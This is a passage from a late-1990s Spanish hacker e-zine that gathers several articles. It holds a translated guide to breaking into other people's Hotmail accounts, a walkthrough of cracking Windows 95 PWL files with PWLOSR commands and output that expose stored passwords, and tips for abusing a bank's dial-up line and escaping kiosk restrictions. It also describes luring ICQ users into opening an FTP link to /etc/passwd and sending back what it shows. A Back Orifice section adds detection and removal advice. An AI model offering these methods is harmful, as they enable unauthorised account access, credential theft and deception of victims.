produce  sobre  el  SSL,  sino  sobre PKCS, (Public Key Cryptografhy Standard)
encargado del intercambio de llaves en SSL.

       El ataque consiste en mandar mensajes cuidadosamente construidos contra
el servidor seguro que produzcan sendos  mensajes de error de vuelta, a partir
de cuya informacion se puede sacar la llave critica para seguridad.

        Se necesitan en torno a un millon de mensajes hecho que debe llamar la
atencion del administrador del sistema.
               	

        3.7 DESPEDIDA

        Bueno  espero que te haya gustado esta primera parte sobre las posibi-
lades  del  comercio  electronico,  y  la  forma  de  aprovecharse,  lo dicho,
cualquier duda o pregunta la puedes dirigir a pata666@bigfoot.com, aqui tienes
mi llave pgp.

       Pues ya estan la pareja de articulos todos juntos, si quieres ver otros
articulos  de  interes  puedes visitar mi web http://membres.xoom.com/pata666.

        To be continued, please insert coin!!!!


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Telefonos celulares (Phreacking) - Azumlord ]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NO TIENES UN CELULAR, QUE ONDA!?, OSEA NO!!!  I -=( Azumlord )=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[ D i s c l a i m e r  ]

   La   informacion  aqui  presentada,  tiene  fines  solamente  educativos,
cualquier  uso indebido de la informacion aqui contenida  es responsabilidad
de usted!  ( Demonios,  eso  lo dijeron  en un comercial???), el autor no se
hace  responsable  de  los daos materiales o psicologicos que sean producto
de un mal uso de lo aqui expuesto.

[ J u s t i f i c a c i o n ]

   Bueno aqui estamos de nuevo, trayendo para ustedes algo de phreacking, en
esta  primera  parte,  de  una  serie  de  partes(o por lo menos eso espero),
hablare sobre las bases de los celulares y de como aprovecharnos de ellos };->

   Es algo corto, pero profundo.... han de disculparme pero esque estoy en
epoca de examenes y no he tenido mucho tiempo libre....

[ L a s  B a s e s ]

   Cuando  hablamos  de  telefonia  celular,  nos  referimos a un sistema de
comunicacion  de  alta tecnologia que facilita la transmision y recepcion de
mensajes   sin   necesidad   de  cables  y en  lugar de estos utiliza  ondas  
electromagneticas que viajan atravez del aire.

   El microfono del celular transforma la voz en un impulso electrico, y asi
la  voz  puede  viajar como  una  onda. Estas ondas golpean una pelicula del
microfono  la  cual esta conectada por medio de unos minusculos cables hacia
un iman.
  
   Al  tener una corriente constante y ser movida por la pelicula delgada se
producen  variaciones  en  la  corriente  que son interpretadas como "la voz
electrica".

   Esta  "voz electrica"  viaja del telefono celular al "Switch" o Centro de
Telefonia Celular de una manera inalambrica. Esto  es  posible  gracias a la
tecnica de frecuencia modulada en donde la "voz electrica" se conecta con lo
que  se  denomina  "Sitio Celular" o "Estacion Base", que  junto  con  otros
sitios  conforman  las  unidades de cobertura que por su forma hexagonal son
llamadas "Celulas".

   Una  vez  que  la  voz es capturada por la "celula", es "demodulada" para
obtener nuevamente  una "voz electrica" y es mandada al "Switch", el cual se
encarga  de  mandar  la  voz  ya sea a otro telefono celular o a un telefono
convencional.

   Ahora una forma mas practica de entender esto seria:

   Cuando marcas un numero a  traves de tu celular, la seal es recibida por
el "Switch" o Central de Telefona Celular desde alguna Estacion Base.

   El "Switch" verifica que el numero  de  tu  celular  este autorizado para
hacer llamadas, si no est autorizado, el "switch" enva un mensaje y da por
terminado el proceso.

   Si  esta  autorizado, el "switch" analiza el numero al que estas llamando
y decide si este pertenece a otro usuario de algun celular, o a un numero de
la Red de Telefona Pblica Conmutada.

  Existen dos tipos de sistemas telefonicos, los analogicos y los digitales:

 ->El sistema Analogico o AMPS(Advanced Mobile Phone System)

   Hace  referencia  a la onda radial por la cual se transmite, es una seal
fragil,  transmitida  a  baja potencia. La llamada es convertida en impulsos
electricos que viajan  en forma de ondas de radio "Analogas" al sonido de la
voz original.

   Estas  ondas se distorsionan facilmente por factores naturales (lluvias),
o  por obstaculos (arboles, estructuras, lineas electronicas), que ocasionan
perdida de la calidad y llamadas perdidas.

   Ademas este tipo de redes no puede ser ampliadas.

 ->El sistema Digital o DAMPS(Digital Advanced Mobile Phone System)

   Toma las seales analogas (sonidos), y las traduce a codigos binarios que
pueden ser transmitidos a alta velocidad, para despues ser  reconvertidos en
el sonido de la voz original. La llamada se transmite de forma similar a los
datos  de  computador,  lo  que  permite que las transmisiones  sean de alta
capacidad, velocidad y resistencia a los inconvenientes usuales.

   Este sistema de redes permite subdividirse con el objeto de ampliarse.

[ D e s p e d i d a ]

 Bueno pues por el momento eso es todo, se que es corto, pero esto solo son
las bases del  sistema celular, en el proximo numero entraremos de fondo en
la clonada de celulares.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Guia para Hackear Hotmail - \Wend|g0 ]

by SnEzE V.2.0 
980123 2.44 PM
Traducido por \Wend|g0 << http://members.xoom.com/wendigo13 >> 

Existen  muchas maneras  de hackear hotmail, pero solamente voy a escribir las
mejores.  Si   estan   no   funcionan,   por   favor,  mandame   un   email  a
christog@hem1.passagen.se  y mirare  si  has  hecho algo  mal o  si hotmail  a
cambiado algo.
Recuerda que esta informacion es solamente para propositos educacionales y que
nadie puede reprocharme el dao que puedas haber causado. Tambien recuerda que
si alguien descubre  que has estado paseando en su cuenta, se puede volver muy
desagradable.
Ok, vamos a ello... 
Estas son las formas que mas me gustan.

____ 
I_1_I - Brute force hacking
a. Usa el telnet para conectar al puerto 110 (servidor de Hotmail). 
b. Escribe USER y el nombre de usuario de la victima. 
c. Escribe PASS y entonces adivina el password. 
d. Repetir hasta que se encuentre el password.
!. Esto se  denomina brute force  hacking y requiere  paciencia. Es mejor  que
   intentar adivinarlos en la pagina principal de hotmail ya que es mas rapido

____ 
I_2_I - La mejor forma
a. Pilla el username de la victima ( normalmente se halla en el adress-field )
b. Entonces escribe " www.hotmail.com/cgi-bin/start/victimsusername " 
c. Estas dentro!
!. Este  hack solamente  funciona si  tu estas  en la  misma red  de trabajo o
   computadora de la victima y si el no ha desconectado del servidor (log out)

____ 
I_3_I - La manera "vieja"
a. Ves  a la  pagina principal  de Hotmail  y pilla  una cuenta (si todavia no
   tienes ninguna)
b. Log Out 
c. Ahora escribe el username de la victima. 
d. Mira el source code. 
e. En la 5 fila deberias encontrar "action=someadress" 
d. Copia esta direccion y pasteala dentro de adress-field 
e. Estas dentro!
!. Como puedes ver esto es un procedimiento muy largo y la victima tiene 
   tiempo de sobra para desconectar (log out).

____ 
I_4_I - Otra...
a. Ves a la pagina principal de Hotmail 
b. Copia el source code. 
c. Haz un nuevo archivo html con el mismo codigo pero cambia method=post y pon
   method=enter
d. Haz un "view" de la pagina 
e. Cambia la direccion a www.hotmail.com/ (No apretes enter !!!) 
f. Haz que la victima escriba su username y password 
g. Mira en el adress-field. Alli podras ver ...&password:something...
!. Esto es lo que yo uso, ya que te deja conocer el password. ( Si el sale del
   browser tu puedes ver el password en el History folder!
   He echo un ejemplo de este truko que puedes usar en:
   hem1.passagen.se/christog/index.htm. Buena suerte!

LEELO!
Los administradores  de Hotmail  han cambiado  el sistema,  asi que la victima
puede desconectar (log out)  incluso si tu  estas dentro de su cuenta. De modo
que no pierdas el tiempo!
Este texto viene de http://hem1.passagen.se/christog/hotmail.htm 
Recuerda que es la version V.2.0.. Pronto habra mas...
Traducido por \Wend|g0 << http://members.xoom.com/wendigo13 >>


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Crackear PWL's - CHack ]

Como decodificar archivos PWL de Win95 (Solo para Newbies). Por CHack ...

Una de tantas maanas en las que leia la lista de Raregazz encontre un mensaje
que hablaba  de la "seguridad"  en Windows 95 y  de que se podia entrar en las
maquinas usando algunos programas que decodifican los password de los usuarios
que se encuentran en los archivos *.PWL

Realmente no  entendi mucho del tema pero el gusanillo de la curiosidad empezo
a crecer;  pero, relamente  que era  eso de  los PWL?, donde  estaban?, que
pitos tocaban?

Lo primero  fue encontrar  esos programas  en Internet,  asi que  buscando  en
varias  paginas aparecieron  el GLIDE  y PWLOSR,  relamente  no  supe como  se
manejaba el GLIDE pero vi que el PWLOSR no era tan dificil de manejar.

La segunda  estapa fue localizar  donde estaban esos  archivos PWL en mi disco
duro y despues de eso tratar de destriparlo.

El archivo PWL lo encontre en el subdirectorio:

C:\WINDOWS

El archivo tenia el nombre

juan.pwl

"casualmente" las letras de mi nombre de usuario juan.

este  archivo lo  copie al  subdirectorio donde  tenia el  PWLOSR y me propuse
tratar  de que el  programa "adivinara" el  pass, cosa no  muy dificil por que
eran solo  tres letras 'AAA'  para  ello en  una  ventana de  DOS  utilice  el
siguiente comando:

PWLOSR.EXE /BRUTEFORCE [PwlFileName] [UserName]

bueno realmente lo que escribi

PWLOSR.EXE /BRUTEFORCE juan.pwl juan

Con ello el programa desplego lo siguiente:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
                                ~~~~~~~~~~~~~~~~~~~~~~~~~
Beginning brute session for file 'JUAN.PWL',
of user 'JUAN' with EnuStr:
<<0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ>>.
Using password lenght 0 characters.
Using password lenght 1 characters.
Using password lenght 2 characters.
Using password lenght 3 characters.
Password 'AAA' - maybe correct!

Efectivamente el programa habia descubierto que mi pass era AAA

Una vez  localizado el  pass me tuve que salir de la ventana de DOS y cerrarla
desde W95, porque el programa continua buscando.

Volvi a abrir la venta de DOS y le di la instruccion

PWLOSR.EXE /LIST[:E] [PwlFileName] [UserName] [UserPwd]

PWLOSR.EXE /LIST:E juan.pwl juan AAA

Desplegando lo siguiente:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
                                ~~~~~~~~~~~~~~~~~~~~~~~~~       
File: 'JUAN.PWL' has size 2B0h bytes
for user 'JUAN' with password 'AAA' contains:

-[Technical Information]---------------------------------------
 Password file version: 968582E3;   Offset to Header: 00000252
 Unknown Align: 0000; UnkCount: 00000001;  CheckSeed: 00000001
 CryptoSeed Array = ( 00000000, 00000000, 00000000, 00000000
-[Resources pointers]------------------------------------------
00  00  00  00  00  00  00  00 - 00  00  00  00  00  00  00  00
-[Resources key indexes]---------------------------------------
00  FF  FF  FF  FF  FF  FF  FF - FF  FF  FF  FF  FF  FF  FF  FF
---------------------------------------------------------------
 CryptoSign =  6C 3A 41 C3 F0 B1 0F A5 FB BD A8 A2 D8 E4 A1 C7
 CheckoSign =  1F B4 4D E1 13 12 F0 CF 9D E3 AC 08 5B 44 58 57
---------------------------------------------------------------
 Data = ( 0290, 0292, 0294, 0296, 0298, 029A, 029C, 029E, 02A0
 Len. = ( 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000, 0000
-[Dump]--------------------------------------------------------
  0290: 02 83 8B F8 - 1E B1 8D 99 - EA F0 7A 97 - 33 9F 85 D5
  02A0: AB F4 E9 92 - BF AE 5E E8 - 8F AC 90 E3 - A6 ED 14 C5
-[Character]---------------------------------------------------
---------------------------------------------------------------

-[Type]-[The resource location string]--------------[Password]-
  Link   PLOPEZ\C                                       pedro
  -??-   222.18.36.18/222.18.36.18             bxbxbxbx:tmibmr
  Dial   *Rna\Data Internet\jmendez                   n33wr66&
  Link   MARYSOL\C                                       mary
  Link   MEMO ROSAS\C                                 memorin
---------------------------------------------------------------
  Key Entrys: 5;   Number of resources: 5.

O sorpresa,  el PWLOSR  no solo desplegaba  mi pass,  sino tambien los login y
password de las  maquinas a las  que me habia conectado dentro de mi intranet,
asi como mis conexiones de internet.

Para este  momento ya la curiosidad  por entrar a mas maquinas me corroia, asi
que  con este  metodo empece  a  entrar  a otras  que  me  dieron  mas  y  mas
informacion; solo me enfrente a tres problemas:

1.-     El programa PWLOSR solo sirve para archivos PWL de W95.

2.-     El nombre del archivo PWL no siempre coincidia con el nombre
        del  usuario, situacion que  corregi observando  el  archivo
        C:\Windows\System.ini que en una parte que dice:

        [Password Lists]
        JOSEANTONIOPEREZ=C:\JOSEANTO.PWL

3.-     Los pass que utiliza la gente no son tan faciles como el mio
        que solo  tenia tres letras, y la fuerza bruta tardaba mucho
        en encontrar  pass de  mas de  4 letras, por lo que tuve que
        utilizar un diccionario  de apoyo que lo llame DICT.VOC y lo
        aplique utilizando para ello el siguiente comando.

        PWLOSR.EXE /VOCABULARY [PwlFileName] [UserName] [VocFile]

        Bueno lo que de verdad escribi fue

        PWLOSR.EXE /VOCABULARY JOSEANTO.PWL JOSEANTONIOPEREZ DICT.VOC

        obteniendo el siguient resultado:

(C) 19-Mar-1998y by Hard Wisdom "OSR/2 PWL Files Manager" v2.0
                                ~~~~~~~~~~~~~~~~~~~~~~~~~       
Beginning vocabulary session for file 'JOSEANTO.PWL',
of user 'JOSEANTONIOPEREZ' via vocabulary 'DICT.VOC'.
Password 'FRANK' - maybe correct!
Password 'FRANK' - maybe correct!

Totally trained 193762 passwords, Vocabulary position 2207350.
Elapsed time 55 seconds; Average speed 3522 passwords per second.
Cracked passwords 2. Check them under MD95 Logon.

Se que  para muchos  el decodificar password  es quiza  su modo de vida, y que
este articulo puede ser  solo un grano de arena en el desierto, pero realmente
espero que  sirva para aquellos  que empiezan en  el oficio  con mas ganas que
conocimiento, y quiza estas  cosa por ser tan faciles nadie se toma el tiempo
para explicarlas.

Gracias  a Hard  Wisdom autor  de PWLOSR,  Gracias a  la lista  que  con  cada
respuesta incrementa mis pregunatas.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Agentes Inteligentes - 12r ]

    ---------------------------------------------------------------------
    ---------------------Agentes Inteligentes----------------------------
    ---------------------by 12r43l Overdrive-----------------------------
    ---------------------12r@antisocial.com------------------------------
    ---------------------------------------------------------------------

El  objetivo de  este  articulo es  explicar  rapidamente que  son los agentes
inteligentes a si como sus pricipales aplicaciones.

Imagina  un dia,  que  lleges a tu PC y tus pendientes, ya esten clasificados,
que  las noticias  que te interesan ya estan en tu escritorio, que las ofertas
que  tanto buscabas  estan esperando tu compra. Todo esto sera posible gracias
al "push-technology"  el cual  se basara en tus preferencias para filtrar todo
tipo de  informacion que  no sea  relevante para  ti y la que te intereza sera
llevada  a tu escritorio;  lista para  que tu  decidas que hacer con ella o en
algunos casos ya este procesada.

Este  tipo  de tecnologia  se  basa en  piezas  de software  llamadas "Agentes
Inteligentes",  los  cuales   realizan   toda   la   labor   de  recopilacion,
clasificacion, filtrado o  procesado  de informacion an su ambiente de trabajo
el cual puede ser desde una PC "standalone" hasta Internet.

Como parte  de los  sistemas de  informacion de siguiente generacion existiran
objetos  semi-autonomos   de   software   que  realizaran  tareas  especificas
previamente establecidas.

Todavia  no existe una  definicion universal de  agentes inteligentes pero una
definicion muy  general podria ser la siguiente:

"Una entidad de software autonoma que ejecuta tareal delegadas por el usuario"

Los  agentes inteligentes  pueden interactuar  con el usuario, con sistemas de
informacion  y  con  otros agentes.  Pueden ser  complejos o simples, trabajar
solos o en grupos creando una sociedad cooperativa. Pueden viajar de un nodo a
otro atravez de la red reportando  sus  actividades.

La  mayoria de  los agentes,  estan basados en la idea de que  el usuario solo
tiene  que especificar  algunas preferencias como por ejemplo 'que', 'cuando',
'donde'  para que ellos puedan tomar deciciones basados en sus instrucciones.

Existen  algunas  caracteristicas  que  puede   tener  un   software  que  sea
considerado un agente.

1.- Delegacion  de actividades.  Puede establecer  algunos  trabajos  a  otros
    agentes para lograr su trabajo final.

2.- Habilidad de comunicacion. Tiene que tener la habilidad de interactuar con
    el usuario asi como con otros agentes o medios.

3.- Monotireo.  El agente  debe de  monitorear su  entorno para poder realizar
    actividades autonomamente.

4.- Actuacion. Debe de poder afectar su ambiente de trabajo.

5.- Inteligencia.  El agente  debe de  poder interpretar  los eventos  que  le
    incumban  para  poder  tener  una  actuacion  apropiada  asi   como  tomar
    deciciones.

6.- Continuacion. Necesita permanecer activo, corriendo procesos y actulizando
    su estado.

7.- Caracter. Algunos agentes pueden tener un estado emocional.

8.- Adaptabilidad.   Deben   optimizarse   automaticamente   basados   en  las
    preferencias de usuario aprendidas previamente.

9.- Mobilidad. Deben  de tener la capacidad de transportarse a traves de redes
    y distintas plataformas y arquitecturas de informacion.

Entre  las  pricipales  aplicaciones  de  los Agentes Inteligentes tenemos las
siguientes:

Correo  electronico, Sistemas  de  soporte de  decision,  Interfaz de usuario,
Teleconferencia,    Telecomunicaciones,     Sistemas     de   calendarizacion,
Entretenimiento, Web, Sistemas FAQ, Archivos de USENET, Editores graficos.
  
Recusos :

LALO (http://www.crim.ca/sbc/english/lalo)
Agent Building Enviroment (http://raleigh.ibm.com/iag/iagsoft.htm)
W-Prolog (http://munkora.cs.mu.oz.au/~winikoff/wp/)
Tabriz Agent Ware (http://www.genmagic.com/Tabriz/)
Phantom (http://apocalypse.org/pub/u/antony/phantom/phantom.html)
Agent builder (http://www.cs.umbc.edu/news/raise.shtml)
Java Intelligent Agent Library
(http://www.bitpix.com/business/main/ialib/ialib.html)
Tcl Plug-ins (http://www.sun.com/960710/feature1/plugin.html)
Aglets Library (http://www.ibm.co.jp/trl/projects/aglets/)
Jess (http://herzberg.ca.sandia.gov/jess/)
Penguin (http://coriolan.amicus.com/penguin.html)
HORB (http://wwww.mysticgrp.com/java/horb/welcome.html)
Autonomus Agent Programming using Java (http://riz.siac.com/AIT/agentref.html)
Java-To-Go- Interactive Computing Using Java.
(http://ptolemy.eecs.berkeley.edu/~wli/group/java2go/java-to-go.html)
Cyberagent SDK (http://www.ftp.com/cyberagents/)
Oracle Web Agent
(http://www.oracle.com/products/websystems/webserver/html/ois3.html)
Phyton (http://www.phyton.org)


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Varios trucos interesantes - SatMex ]

1) Como joder los banners del anonymizer.com

Estas cansado de los banners? Yo si y mucho pero te voy a decir como quitarlos
sin pagar un centavo solo tienes que cambiar el puerto:

http://invis.user.anonymizer.com/www.hostremoto.com.gob.mx.etc.etc

Activalo en tu browser como proxy (donde dice puerto no escribas nada) y listo
tienes  proxy. La  diferencia del  anonymizer y otros ademas de que cobran por
usarlo es que te permite entrar a cualquier direccion no importa que no acepte
proxy (por lo menos en el hotmail me funciona).

Si  por alguna  razon  es cancelado  te voy a decir como puedes saver la nueva
direccion  o el proxy; esto lo descubri escaneando los puertos del anonymizer.
Es facil, solo con el un port scanner escanea www.anonymizer.com y los puertos
que  esten abiertos  trata  de ver  su  los puedes  usar  de proxy. Hay muchos
puertos abiertos y la mayoria funcionan.


2) Como poder explorar las computadorasde telmex que estan de demostracion con
   internet directo.

La  otra vez que fui a pagar el telefono a telmex y descubri que habian puesto
computadoras  de muestra  con  internet para  los  clientes :) lo  malo es que
estaban  protegida con  algun  programa que  no te deja usar explorer, ms-dos,
promt,  desabilitadas  muchas  opciones (la  verdad casi todas, run, shutdown,
restar,  restar msdos,  etc,  le busque  y  le busque  pero  con  que  estaban
deshablilitadas  muchas opciones pero usando el internet explorer (browser) en
donde  esta el  link  puedes poner  c:\windows  y puedes ver la informacion  y
ejecutarla.. (en el caso de mi pueblo asi estan deshabilitadas las opciones no
se sin en otro lugar estan activadas)


3) Banco Bital

La  otra vez  lei  en un  emag  de raregazz pasado un numero carrier del banco
bital. El  numero era 91-800-50140 pues lo probe como una conexion ordinaria a
internet y cuando te pide el  username: password y le das cualquier username y
password  y marca que  es incorrecto el login lo intentas de nuevo y en cuanto
des  enter despues  de que  escribas  la password  precionas  la tecla F7 y te
conecta  a internet  a  una velocidad de 9600bps (te lo garantizo pero primero
tienes  que precionar  breaks para que te aparezca el login). Pero no te creas
que  ya tienes  conexion a internet. lo  bueno es que te asigna ip adress pero
unicamente   solo  puedes  utilizar el  ICQ y puedes escanear puertos, finger,
whois,  ping, trace.  Tambien  si se  conectan 2 o mas personas con este mismo
numero  pueden compartir  informacion  por la  razon  que  estan  en  el mismo
servidor y pudes poner tu ftp server y que el otro usuario pueda entrar.
Pero  no puedes entrar a ningun chat no puedes usar telnet ni conectarte a una
pagina web al menos que sea la pagina de www.bital.com.mx)

Usa condon pa que no te cachen.....

Proximamente  tendre el numero de telefono (carrier) para que te conectes free
a internet por medio de este servidor con estas claves.....


4) Hackeando desde el ICQ

En  estos dias  el icq  es el programa mas popular en el internet; si no sabes
que  es icq, es un programita que viene siendo un beeper y un celular mientras
ese programita este activado estaras en linea con tus amigos. Pero no te voy a
explicar  muy bien  mejor  vete a  www.mirabilis.com. Ahora que el icq esta de
moda  supongamos que  nececitas una  password de un servidor Ftp o alguien que
quieras  que te  haga el favor de bajarte el /etc/shadow pues de la manera mas
facil  te vas  a "add  find users".  Alli esta  la  opcion "icq  main  engine"
escojela y donde dice email pones *@host.com.gob.mx.etc.etc y te saldran todos
los  usuarios de  ese  servidor y  alli tu podras ver su info (all algunos muy
l4m3rz que hasta ponen su telefono y su direccion  y su nombre completo email,
etc;)   esto  resulta mejor que el finger ;) de alli es una forma de tratar de
acesar usando  los apellidos  o nombres de la persona pero otra forma que a mi
me  a resultado es contactando a esa persona y haciendome su amiga entonces le
hago  preguntas tu  provedor acepta ftp? tu provedor te da tu password o tu la
eliges? Si  no sabe  que es  ftp solo  dale el ftp pero en el browser dile que
ponga esto porque se de muchos ignorantes que no saben ni madre:
ftp://username:password@la_direccion_de_su_server.com/etc/passwd
y dile que te pase el texto que salio  ;)
O tambien puedes usar mas ingenieria social solo es cuestion de pensar.....
(te  recomiendo que  registres otra cuenta y te pongas nombre de mujer joven y
atractiva para obtener mejores resultados y para que no te cachen.....)


5) Hacer Preacking desde cualquier lugar del mundo llamando a Usa *free*

Te  has fijado  que los  telefonos publicos de USA (Estados Unidos Americanos)
puedes llamar  a los  telefonos publicos?. Haz una  llamada  por  cobrar a  un
telefono publico y cuando contesten de el otro lado ese telefono sonara (claro
que  el publico)  la operadora dire "acepta los cargos y ustedes contestan si.
Si no lo has hecho hazlo  =)
Recuerda  que tienes  que  buscar  un  telefono  publico  que permita  recibir
llamadas; de esos hay muchos en USA, no se si en otro lado habra; a mi siempre
me funciona cuando hablo con mis hermanos....

Email Me:
Sat@lanet.com.pe
Sat@cotopaxi.dyn.ml.org


|(r) SatMex (r)ϯ|


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ IRC - ToMaCHeLi/ZeD ]

              MANERAS DE COLARSE (y prevenirse) EN UN HD ATRAVES DEL IRC   
                                    POR
                ToMaCHeLi--(http://members.tripod.com/~tomacheli)

                                     Y

                ZeD------(http://www.angelfire.com/ak/HACKZED/ZED2.html)

             MIEMBROS DEL HaCk`S-wEb-RiNg--(http://come.to/HaCkS-wEb-RiNg)


Ŀ
INTRODUCCION


Debido  al creciente  aumento de  maneras que  existen de entrar y/o controlar
computadoras  ejenas a traves  del irc,  nos hemos  decidido a  escribir  este
articulo para raregazz.
En el trataremos de explicar las formas que hay para introducirse, controlar..
un ordenador de forma remota a traves del irc.

Si quieres comentarnos algo, aqui tienes nuestros mails:
ToMaCHeLi----tomacheli@geocities.com
      ZeD----zed@mixmail.com 

Ŀ
FIN DE LA INTRODUCCION



                BACK ORIFICE.
--------------------------------------

El  Back Orifice  lo  creo  no  hace  demasiado tiempo  un  grupo  de  hackers
americanos con el fin de poder entrar en cualquier ordenador sabiendo tan solo
la IP del usuario.
Si te mandan un .EXE     NO LO EJECUTES A MENOS QUE ESTES COMPLETAMENTE SEGURO
DE LO QUE ES.

Muchas  personas estan  propagando por  inet el  programa SERVER  de  diversas
maneras  (lo mas extendido  es por el IRC). Y aqui entra en papel el ignorante
internauta  que  se  dedica a ejecutarlo  en  su  maquina  creyendo que es  un
autoextractor   de  fotos X   :). Una  vez  ejecutado  SORPRESA!,  el  archivo
desaparece ???  otia  ???,  y  la  pobre victima  piensa, (bah, me habra
llegado defectuoso el archivo), y no le da importancia.
Si,  pues chaval  FELICIDADES acabas  de meter  un  troyano en  tu sistema :),
cualquiera  que sepa  tu IP podra hacer en tu PCera casi lo que le de la gana.
Tas cubierto de gloria :)) (mas bien de mierda que OTROS te han tirao encima).

El troyano en cuestion funciona de la siguiente manera:
cuando ejecutas el .EXE este instala un programa que se llama (espacio).exe
y borra el ejecutable que te han pasado.
Cada vez que reinicies tu windo2 (solo funciona en este sistema) el troyano se
auntoinstalara y se cargara en memoria (osea que olvidate de borrar el archivo
(espacio).exe,por que no funcionara).

El troyano deja abierto un puerto en tu sistema LIBRE DE CUALQUIER PROTECCION.
este  es un  puerto llamado "31173" (sin comillas)(31173=elite) A traves de un
programa  que debe tener  la persona que quiere acceder a tu computadora, este
accedera directamente a tu c:\ a traves  de unos comandos muy simples,pudiendo
hacer lo que le de la gana dentro de tu ordenador,subir y bajar archivos,abrir
mas puertos,ajecutar programas,incluso formatear el disco duro.
Si notas que  te esta pasando  alguna de estas cosas lo que puedes hacer es lo
siguiente:
desconectate de internet y procede a borrar el troyano de la siguiente manera:

Pa que lo pilles rapido,  el archivo se mueve del directorio donde esta y va a
parar al directorio :\windows\system  convertido en (espacio).exe  y ademas en
el editor registros (REGEDIT), carpeta RunServices (puede ser que este en otra
carpeta)  se incorpora  la siguiente linea en DATOS: "(espacio).exe", para que
nada  mas arrancar el ventanucos el troyano quede en memoria. Y diras bah, pos
entonces borro el archivo (espacio).exe y yasta.
Si hijo si, prueba y veras, ni flowers, al tenerlo en memoria no deja borrarlo.
Y entonces??, a jodese jejeje.

        NO, TRANQUILO HAY UNA SOLUCION (por lo menos a mi me va).
        Pero eso te lo dire mas adelante, ahora sigue leyendo....


Como puedo saber si tengo el troyano en el sistema?
---------------------------------------------------
        La manera mas facil que hay es utilizar el programa CLIENT (cliente)
apuntando a la direccion IP 127.0.0.1 que es tu propia maquina, no se precisa
que estes conectado a inet. Cuando ya hallas apuntado a esta IP, desde el
cliente de BO manda un PING, si no te responde nada, vale estas limpio y no
tienes el troyano, pero si te pone algo como esto:

------- Packet received from 127.0.0.1 port 31337 -------
  !PONG!1.20!DEFAULT!
------- End of data -------

Opssss, estas jodio, tan colao el troyano...

*****************************************************************************

Nota: Si no lo tienes en el sistema puedes metertelo y probar las maravillas
      y putadas que te pueden hacer los demas (haciendotelas a ti mismo) ;)
      y sin ningun peligro al no estar conectado a inet.

*****************************************************************************


Vale lo tengo y estoy muy asustao como coo me lo quito?
---------------------------------------------------------

        Puede que algunos ya lo hallais descubierto, para mi fue facil, la
verdad. Ya sabemos que al ejecutar el archivo del SERVER, este se convierte
en (espacio).exe y va a parar al directorio :\windows\system. (OJO, hay una 
manera de configurar este nombre y es posible que no siempre el troyano sea 
el (espacio).exe) 
        Vale, como he dicho antes si intentas borrarlo, nanai, por que ya
esta en memoria, asi que lo mas normal es pensar que puede haber una linea
donde hace que se ejecute el troyano en el archivo SYSTEM.INI o WIN.INI
al iniciar el ventanucos. Pos fui a buscarlo por alli y NOP nada de nada, lo
siguiente que pense es buscarlo en el editor de registros (REGEDIT), pos
palli voy, en el menu pincho: EDICION/BUSCAR/ pongo (espacio).exe y activo
CLAVES, VALORES y DATOS y TACHAN! en una carpeta llamada RunServices (sigo 
diciendo que puede estar en otra carpeta) aparece en DATOS el nombre del 
archivito YA LO TENEMOS! solo queda eliminar la linea de DATOS para ello 
pincha donde pone el NOMBRE (suele ser (predeterminado)) y eliminalo, (la 
carpeta no la borres) una vez eliminado ya puedes cerrar la ventana del 
editor de registros (Nota: es posible que en la busqueda aparezcan mas 
